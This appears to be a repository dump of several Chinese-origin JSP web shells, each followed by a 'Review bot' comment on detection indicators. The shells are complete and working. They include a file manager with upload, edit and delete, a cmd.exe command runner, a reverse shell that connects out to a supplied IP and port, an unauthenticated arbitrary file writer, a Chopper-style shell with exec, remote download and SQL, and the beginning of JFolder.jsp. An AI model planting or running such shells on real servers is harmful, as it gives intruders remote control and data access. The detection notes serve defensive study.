long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("文件上传成功!");
}
catch(Exception e)
{
out.print("文件上传失败!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()得到虚拟路径%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
</td>
</tr>
</table>
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>
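Review bot: The header comment (`Description: jsp网站管理`) does not say what the scriptlets actually do, and nothing in the file lists the request parameters that drive it, which is the part a defender writing detections from this sample needs. A comment near the top along the lines of `<%-- parameters: password, command, editfile/content, delfile, deldir, dir, fileexe, scrfile/dstfile, up, jsptz, path --%>` would document them. Two host-side artifacts follow from the visible code: the helpers print fixed strings such as `文件已经创建!` through `System.out.println`, which normally ends up in the container's stdout log, and the upload branch first writes the raw request body to a file named after `session.getId()` in the `path` directory and calls `f1.delete()` only on the success path, so a failed upload leaves that file behind. The page also carries the static strings `JspWebShell By 绝对零度` and `Power By 绝对零度`, the version text differs between the login panel (1.2) and the file-browser header (1.0), and the submitted password is compared against the hard-coded `_password` and then kept in the session in plain text.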


@ -0,0 +1,31 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
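Review bot: The first line, `// note that linux = cmd and windows = "cmd.exe /c + cmd"`, sits outside any `<% %>` scriptlet, so it is template text sent in every response rather than a comment, and the file has no real description of what it does. A header such as `<%-- sample: passes request parameter cmd to Runtime.exec with a fixed "cmd.exe /C " prefix; Windows-only as written --%>` would document it. For detection, that stray line and the `ACTION='cmdjsp.jsp'` form markup are fixed strings in the response. Because the form is `METHOD=GET`, the `cmd` value travels in the query string and would normally be recorded in web-server access logs. On the host the trace is the servlet container process starting `cmd.exe`.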


@ -0,0 +1,90 @@
// backdoor.jsp
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
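Review bot: The final scriptlet takes `ipaddress` and `port` from the POST body, opens `new Socket(ipAddress, ...)` to that address and attaches the socket to a `cmd.exe` process through two `StreamConnector` threads, and nothing on the page authenticates the caller. The resulting session is an outbound connection initiated by the application server, so inbound-only filtering never sees it. The controls that apply are default-deny egress from the container's host and an alert on the container process spawning `cmd.exe`. For content scanning of web roots, the `<h1>JSP Backdoor Reverse Shell</h1>` heading and the `StreamConnector` class name are stable strings.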


@ -0,0 +1,48 @@
<%@page contentType="text/html;charset=utf-8"%>
<%@page import="java.io.*,java.util.*,java.net.*"%>
<html>
<head>
<title>JspDo Code By Xiao.3</title>
<style type="text/css">
body { color:red; font-size:12px; background-color:white; }
</style>
</head>
<body>
<%
if(request.getParameter("context")!=null)
{ //这小马有问题 上传jsp就出错
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8");
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8");
OutputStream pt = null;
try {
pt = new FileOutputStream(path);
pt.write(context.getBytes());
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");
} catch (FileNotFoundException ex2) {
out.println("<font color='red'>上传失败!</font>");
} catch (IOException ex) {
out.println("<font color='red'>上传失败!</font>");
} finally {
try {
pt.close();
} catch (IOException ex3) {
out.println("<font color='red'>上传失败!</font>");
}
}
}
%>
<form name="frmUpload" method="post" action="">
<font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>
<br>
<br>
<font color="blue">上传文件路径:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")+"\k8cmd.jsp"); %>">
<br>
<br>
上传文件内容:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
<br>
<br>
<input type="submit" name="btnSubmit" value="Upload">
</form>
</body>
</html>
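Review bot: The first scriptlet writes the `context` parameter to whatever location the `path` parameter names via `new FileOutputStream(path)`, with no authentication, no restriction to a base directory and no check on the extension. A single POST can therefore place an executable JSP anywhere the container's account can write. The effective mitigations sit outside the file: run the container with a read-only web root and monitor deployed application directories for newly created `.jsp` files. In request logs, a POST to a JSP that pairs `path` and `context` form fields is the indicator.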


@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="xc";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>
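Review bot: The request-handling scriptlet dispatches on the value of the parameter named by `Pwd` to file read, write and delete, remote download (`LL`), process execution (`Runtime.getRuntime().exec(c)` under `M`) and arbitrary SQL over a caller-supplied JDBC string (`GC`/`QQ`). That parameter name is the only secret and nothing else authenticates the caller. Every response is framed as `->|` … `|<-` and requests carry `z0`, `z1` and `z2`, so network and log detections have a fixed shape and should not key on the `Pwd` value, which is trivially changed. On disk, the `<%!` declaration block of two-letter methods (`AA` … `QQ`) is distinctive enough for a content rule over web roots.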


982
jsp/hackk8/fuck-jsp/in.jsp Normal file

@ -0,0 +1,982 @@
<%
/**
xxxxxxxxxxxx xxxxxxxxxxxxxxxx
@xxxxxxxxx JFolder.jsp
@Description x。
@Author Steven Cee
@Email xxxx@Gmail.com
@Bugs : 下载时,中文文件名无法正常显示
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本0 : 中文; 1英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> </font>"," <font color=red> </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"","System Property"};
String[] strHelp = {"","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
